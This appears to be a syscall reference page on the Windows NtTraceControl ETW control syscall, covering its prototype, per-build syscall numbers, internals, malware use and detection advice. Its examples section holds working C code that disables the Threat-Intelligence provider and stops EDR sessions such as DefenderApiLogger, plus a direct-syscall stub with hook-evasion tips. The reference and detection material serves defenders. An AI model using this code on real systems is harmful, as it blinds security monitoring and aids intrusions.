Tags: ntoskrnl.exe · T1562.006 · T1562 · T1106

NtTraceControl

Multiplexed control syscall (an IOCTL-style dispatcher) for the ETW subsystem: start, stop, query, update and flush logger sessions, enable or disable providers inside a session, and enumerate registered provider GUIDs.

Prototype

NTSTATUS NtTraceControl(
  ULONG  FunctionCode,
  PVOID  InBuffer,
  ULONG  InBufferLen,
  PVOID  OutBuffer,
  ULONG  OutBufferLen,
  PULONG ReturnLength
);

Arguments

| Name | Type | Dir | Description |
| --- | --- | --- | --- |
| FunctionCode | ULONG | in | Operation selector (the `ETWTRACECONTROLCODE` enum in the phnt headers): 1 = EtwStartLoggerCode, 2 = EtwStopLoggerCode, 3 = EtwQueryLoggerCode, 4 = EtwUpdateLoggerCode, 5 = EtwFlushLoggerCode. Provider enable/disable from `EnableTraceEx2` is not its own code; it is carried as a data block (EtwSendDataBlock, 17). Higher codes cover provider registration, notifications and GUID enumeration. |
| InBuffer | PVOID | in | Function-specific input: an `EVENT_TRACE_PROPERTIES` for the session codes, an `ETW_ENABLE_NOTIFICATION_PACKET` for provider enable/disable. |
| InBufferLen | ULONG | in | Size of InBuffer in bytes. |
| OutBuffer | PVOID | out | Function-specific output buffer; for Query, the updated `EVENT_TRACE_PROPERTIES` with session statistics and the logger handle in `Wnode.HistoricalContext`. |
| OutBufferLen | ULONG | in | Capacity of OutBuffer in bytes. |
| ReturnLength | PULONG | out | Receives the number of bytes actually written to OutBuffer. |

Syscall IDs by Windows version

| Windows version | Syscall ID | Build |
| --- | --- | --- |
| Win10 1507 | 0x1A6 | win10-1507 |
| Win10 1607 | 0x1AF | win10-1607 |
| Win10 1703 | 0x1B5 | win10-1703 |
| Win10 1709 | 0x1B9 | win10-1709 |
| Win10 1803 | 0x1BB | win10-1803 |
| Win10 1809 | 0x1BC | win10-1809 |
| Win10 1903 | 0x1BD | win10-1903 |
| Win10 1909 | 0x1BD | win10-1909 |
| Win10 2004 | 0x1C3 | win10-2004 |
| Win10 20H2 | 0x1C3 | win10-20h2 |
| Win10 21H1 | 0x1C3 | win10-21h1 |
| Win10 21H2 | 0x1C5 | win10-21h2 |
| Win10 22H2 | 0x1C5 | win10-22h2 |
| Win11 21H2 | 0x1CF | win11-21h2 |
| Win11 22H2 | 0x1D3 | win11-22h2 |
| Win11 23H2 | 0x1D3 | win11-23h2 |
| Win11 24H2 | 0x1D6 | win11-24h2 |
| Server 2016 | 0x1AF | winserver-2016 |
| Server 2019 | 0x1BC | winserver-2019 |
| Server 2022 | 0x1CB | winserver-2022 |
| Server 2025 | 0x1D6 | winserver-2025 |

Kernel module

ntoskrnl.exe: NtTraceControl

Related APIs

StartTraceW · StopTraceW · ControlTraceW · QueryTraceW · EnableTraceEx2 · EnumerateTraceGuidsEx · NtTraceEvent

Syscall stub

4C 8B D1                  mov r10, rcx
B8 D6 01 00 00            mov eax, 0x1D6
F6 04 25 08 03 FE 7F 01   test byte ptr [0x7FFE0308], 1
75 03                     jne short +3
0F 05                     syscall
C3                        ret
CD 2E                     int 2Eh
C3                        ret

Undocumented notes

The entire user-mode ETW *control surface* sits on top of `NtTraceControl`. `StartTrace`, `StopTrace`, `ControlTraceW`, `QueryTrace`, `FlushTrace`, `EnableTraceEx2`, `EnumerateTraceGuidsEx`: all of them marshal an `EVENT_TRACE_PROPERTIES` (or one of the internal control packets, such as `ETW_ENABLE_NOTIFICATION_PACKET`) and dispatch to this one syscall, with `FunctionCode` selecting the operation; the `ETWTRACECONTROLCODE` enum in the phnt headers names the codes. Session control is gated by an access check against the session's security descriptor (the `TRACELOG_*` rights that `EventAccessControl` manages, stored per GUID under `HKLM\SYSTEM\CurrentControlSet\Control\WMI\Security`), provider enable/disable by the provider GUID's descriptor (`TRACELOG_GUID_ENABLE`), and profiling-related kernel flags additionally by `SeSystemProfilePrivilege`. In practice that means local administrators, Performance Log Users or SYSTEM, with some sessions locked down further. Turning a provider off inside someone else's session is the path attackers care about, because it blinds the consumer without visibly stopping the session. The SSN drifts roughly every Windows release, so any hardcoded number breaks across builds; `0x1D6` on Win11 24H2 / Server 2025 per the table above.

Common malware usage

**The major ETW bypass surface.** The textbook user-mode ETW patch (overwrite the first byte of `ntdll!EtwEventWrite` with `0xC3`) only blinds the *current process*. Telemetry that defenders collect system-wide, most notably the `Microsoft-Windows-Threat-Intelligence` provider consumed by EDR, lives in a session the attacker's process does not own. To silence it, attackers drive `NtTraceControl` the way `EnableTraceEx2(..., EVENT_CONTROL_CODE_DISABLE_PROVIDER, ...)` does, sending a disable notification for the provider into the EDR's session, or issue `EtwStopLoggerCode` (2) to tear the session down outright. **Cobalt Strike**, **Brute Ratel C4**, **Havoc**, **Nighthawk**, and the open-source **SharpEtwBypass** / **TamperETW** all ship variants of this. Kernel-mode counterparts (the Lazarus **FudModule** rootkit) achieve the same by zeroing `EtwThreatIntProvRegHandle` directly: a different primitive that bypasses `NtTraceControl` entirely but produces the same blackout. Both session-level operations fail the ETW access check unless the calling process owns the session or holds the `TRACELOG_*` rights on it (local administrator, Performance Log Users, or SYSTEM), which is why most chains pivot through an elevated or SYSTEM-context payload first.

Detection opportunities

Hook-based AVs cannot see this: by definition the attacker is disabling the telemetry. The kernel-side answer is to *not depend on the session being alive*: register a second, redundant ETW Threat-Intelligence consumer from a kernel driver (PPL EDR drivers do this), or use the `Microsoft-Windows-Kernel-EventTracing` provider, whose Admin channel records session stops and trace-configuration changes (4 = SessionStop, 12 = TraceConfigChange; confirm the IDs against the provider manifest on the target build with `wevtutil gp Microsoft-Windows-Kernel-EventTracing /ge:true`). Watch for any non-Microsoft-signed process calling `ControlTraceW` or `EnableTraceEx2` against well-known EDR session names (`DefenderApiLogger`, `EventLog-Security`, `MS_Mon_*`, vendor-specific), and periodically reconcile the running session list (`logman query -ets`) against the expected baseline, since a stopped session is silent rather than noisy. On Server 2022+ the Microsoft Defender for Endpoint sensor logs ETW session tampering directly as an alert. At the kernel level, `EtwThreatIntProvRegHandle == NULL` while the system is supposedly running with TI logging enabled is the smoking gun for the BYOVD variant.

Direct syscall examples

C: Disable Threat-Intelligence provider in a target session

```c
// Disable Microsoft-Windows-Threat-Intelligence (GUID {f4e1897c-bb5d-5668-f1d8-040f4d8dd344})
// inside an existing logger session, given its name. The handle of a session this process
// did not start is obtained with EVENT_TRACE_CONTROL_QUERY: on return,
// Wnode.HistoricalContext holds the logger handle. Succeeds only if the caller passes the
// ETW access check on the session and provider security descriptors.
#include <windows.h>
#include <evntrace.h>
#pragma comment(lib, "advapi32.lib")

static const GUID kThreatIntel =
    { 0xf4e1897c, 0xbb5d, 0x5668, { 0xf1,0xd8,0x04,0x0f,0x4d,0x8d,0xd3,0x44 } };

ULONG disable_ti_in_session(LPCWSTR sessionName) {
    BYTE buf[sizeof(EVENT_TRACE_PROPERTIES) + 2 * 1024] = { 0 };
    EVENT_TRACE_PROPERTIES* props = (EVENT_TRACE_PROPERTIES*)buf;
    props->Wnode.BufferSize = sizeof(buf);
    props->LoggerNameOffset = sizeof(EVENT_TRACE_PROPERTIES);
    props->LogFileNameOffset = sizeof(EVENT_TRACE_PROPERTIES) + 1024;

    // Query by name to learn the session's handle (EtwQueryLoggerCode underneath).
    ULONG st = ControlTraceW(0, sessionName, props, EVENT_TRACE_CONTROL_QUERY);
    if (st != ERROR_SUCCESS) return st;
    TRACEHANDLE hSession = props->Wnode.HistoricalContext;

    ENABLE_TRACE_PARAMETERS p = { 0 };
    p.Version = ENABLE_TRACE_PARAMETERS_VERSION_2;
    // Marshalled as an ETW_ENABLE_NOTIFICATION_PACKET and sent through NtTraceControl's
    // data-block path (EtwSendDataBlock); there is no separate "disable provider" code.
    return EnableTraceEx2(hSession, &kThreatIntel,
                          EVENT_CONTROL_CODE_DISABLE_PROVIDER,
                          TRACE_LEVEL_NONE, 0, 0, 0, &p);
}
```

C: Stop a named EDR session outright

```c
// Tears the whole session down: ControlTraceW with EVENT_TRACE_CONTROL_STOP is
// NtTraceControl with EtwStopLoggerCode (2). Returns ERROR_ACCESS_DENIED unless the
// caller passes the session's ETW access check, ERROR_WMI_INSTANCE_NOT_FOUND if the
// session is not running.
#include <windows.h>
#include <evntrace.h>
#pragma comment(lib, "advapi32.lib")

ULONG stop_session_by_name(LPCWSTR sessionName) {
    BYTE buf[sizeof(EVENT_TRACE_PROPERTIES) + 2 * 1024] = { 0 };
    EVENT_TRACE_PROPERTIES* props = (EVENT_TRACE_PROPERTIES*)buf;
    props->Wnode.BufferSize = sizeof(buf);
    props->LoggerNameOffset = sizeof(EVENT_TRACE_PROPERTIES);
    props->LogFileNameOffset = sizeof(EVENT_TRACE_PROPERTIES) + 1024;
    return ControlTraceW(0, sessionName, props, EVENT_TRACE_CONTROL_STOP);
}

// e.g. stop_session_by_name(L"DefenderApiLogger");   // typical Microsoft Defender ETW session
```

asm: x64 direct stub (Win11 24H2 / Server 2025, SSN 0x1D6)

```asm
; The SSN drifts per build: resolve it at run time (Hell's Gate parses the live ntdll
; stub, Halo's Gate walks to an unhooked neighbour) instead of hardcoding it.
; The int 2Eh fallback of the ntdll stub is dropped; this always uses syscall.
NtTraceControl PROC
    mov  r10, rcx
    mov  eax, 1D6h
    syscall
    ret
NtTraceControl ENDP
```

MITRE ATT&CK mappings

- T1562.006 Impair Defenses: Indicator Blocking
- T1562 Impair Defenses
- T1106 Native API

Last verified: 2026-05-20